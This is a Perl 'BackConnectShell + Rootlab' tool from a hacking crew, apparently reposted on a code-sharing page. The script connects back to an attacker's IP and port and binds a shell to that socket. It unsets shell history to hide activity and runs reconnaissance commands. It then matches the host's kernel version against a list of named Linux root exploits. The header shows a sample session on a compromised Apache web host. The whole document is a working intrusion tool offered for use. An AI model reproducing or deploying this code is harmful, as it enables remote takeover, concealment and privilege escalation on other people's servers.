Perl BackConnectShell + Rootlab t00l

2009-02-02 13:07
#!/usr/bin/perl
# D.O.M TEAM - 2007
# anonyph; arp; ka0x; xarnuz
# 2005 - 2007
# BackConnectShell + Rootlab t00l
# priv8!
# [email protected]
#
# Backconnect by data cha0s (modificada por D.O.M)
# r00t l4b by D.O.M
#
# ka0x:~/Desktop # ./nc -lvvp 8600
# listening on [any] 8600 ...
# 66.232.128.123: inverse host lookup failed: h_errno 11004: NO_DATA
# connect to [00.00.00.00] from (UNKNOWN) [66.232.128.123] 40444: NO_DATA

# ******* ConnectBack Shell *******

# Linux version 2.6.9-022stab078.14-smp ([email protected]) (gcc version 3.
# 3.3 20040412 (Red Hat Linux 3.3.3-7)) #1 SMP Wed Jul 19 14:26:20 MSD 2006
# apache
# uid=48(apache) gid=48(apache) groups=48(apache),500(webadmin ),2523(psaserv)
# /home/httpd/vhosts/holler.co.uk/httpdocs/datatest

# Kernel local: 2.6.9-022stab078.14-smp

# P0sible 3xploit: exp.sh
# P0sible 3xploit: krad3
# P0sible 3xploit: newsmp
# P0sible 3xploit: ptrace_kmod
# P0sible 3xploit: py2
# P0sible 3xploit: ong_bak
# P0sible 3xploit: prctl3
# P0sible 3xploit: prctl
# P0sible 3xploit: kmdx
# P0sible 3xploit: pwned
#
# sh: no job control in this shell
# sh-2.05b$

use IO::Socket;
use Socket;
use FileHandle;

$system = '/bin/bash';
if(!$ARGV[0])
{
print "/nBackConnect Shell - D.O.M TEAM/n/n";
print "Usage: perl $0 [IPHOST] [NCPORT]/n";
print "Example: perl $0 82.85.55.21 6850/n/n";
exit;
}

socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) ||
die print "[-] Protocolo Desconocido/n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) ||
die print "[-] Error Socket/n";
print "[+] BackConnect Shell/n";
print "[+] Conectando a $ARGV[0]... /n";
print "[+] Enviando Shell... /n";
print "[+] Conectado. /n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "/n******* ConnectBack Shell *******/n/n";
system("unset HISTFILE;unset SAVEHIST ;cat /proc/version;whoami;id;who;pwd");

# Rootkernel

my $khost = `uname -r`;
chomp($khost);
print "/nKernel local: $khost/n/n";

my %h;
$h{'w00t'} = { vuln=>['2.4.18','2.4.10','2.4.21','2. 4.19','2.4.17','2.4. 16','2.4.20'] };
$h{'brk'} = { vuln=>['2.4.22','2.4.21','2.4.10','2. 4.20'] };
$h{'ave'} = { vuln=>['2.4.19','2.4.20'] };
$h{'elflbl'} = { vuln=>['2.4.29'] };
$h{'elfdump'} = { vuln=>['2.4.27'] };
$h{'expand_stack'} = { vuln=>['2.4.29'] };
$h{'h00lyshit'} = { vuln=>['2.6.8','2.6.10','2.6.11','2.6 .12'] };
$h{'kdump'} = { vuln=>['2.6.13'] };
$h{'km2'} = { vuln=>['2.4.18','2.4.22'] };
$h{'krad'} = { vuln=>['2.6.11'] };
$h{'krad3'} = { vuln=>['2.6.11','2.6.9'] };
$h{'local26'} = { vuln=>['2.6.13'] };
$h{'loko'} = { vuln=>['2.4.22','2.4.23','2.4.24'] };
$h{'mremap_pte'} = { vuln=>['2.4.20','2.2.25','2.4.24'] };
$h{'newlocal'} = { vuln=>['2.4.17','2.4.19'] };
$h{'ong_bak'} = { vuln=>['2.4.','2.6.'] };
$h{'ptrace'} = { vuln=>['2.2.24','2.4.22'] };
$h{'ptrace_kmod'} = { vuln=>['2.4.','2.6.'] };
$h{'ptrace24'} = { vuln=>['2.4.9'] };
$h{'pwned'} = { vuln=>['2.4.','2.6.'] };
$h{'py2'} = { vuln=>['2.6.9','2.6.17','2.6.15','2.6 .13'] };
$h{'raptor_prctl'} = { vuln=>['2.6.13','2.6.17','2.6.16','2. 6.13'] };
$h{'prctl3'} = { vuln=>['2.6.13','2.6.17','2.6.9'] };
$h{'remap'} = { vuln=>['2.4.'] };
$h{'rip'} = { vuln=>['2.2.'] };
$h{'stackgrow2'} = { vuln=>['2.4.29','2.6.10'] };
$h{'uselib24'} = { vuln=>['2.4.29','2.6.10','2.4.22','2. 4.25'] };
$h{'newsmp'} = { vuln=>['2.6.'] };
$h{'smpracer'} = { vuln=>['2.4.29'] };
$h{'loginx'} = { vuln=>['2.4.22'] };
$h{'exp.sh'} = { vuln=>['2.6.9','2.6.10','2.6.16','2.6 .13'] };
$h{'prctl'} = { vuln=>['2.6.'] };
$h{'kmdx'} = { vuln=>['2.6.','2.4.'] };

&busca;
sub busca {
foreach my $key(keys %h){

foreach my $kernel ( @{ $h{$key}{'vuln'} } ){

if($khost=~/^$kernel/){
chop($kernel) if ($kernel=~//.$/);
print "P0sible 3xploit: ". $key ."/n";
}
}
}
}
print "/n/n/n";
system 'export TERM=xterm;exec sh -i';
system($system);


__END__

你可能感兴趣的:(Perl BackConnectShell + Rootlab t00l)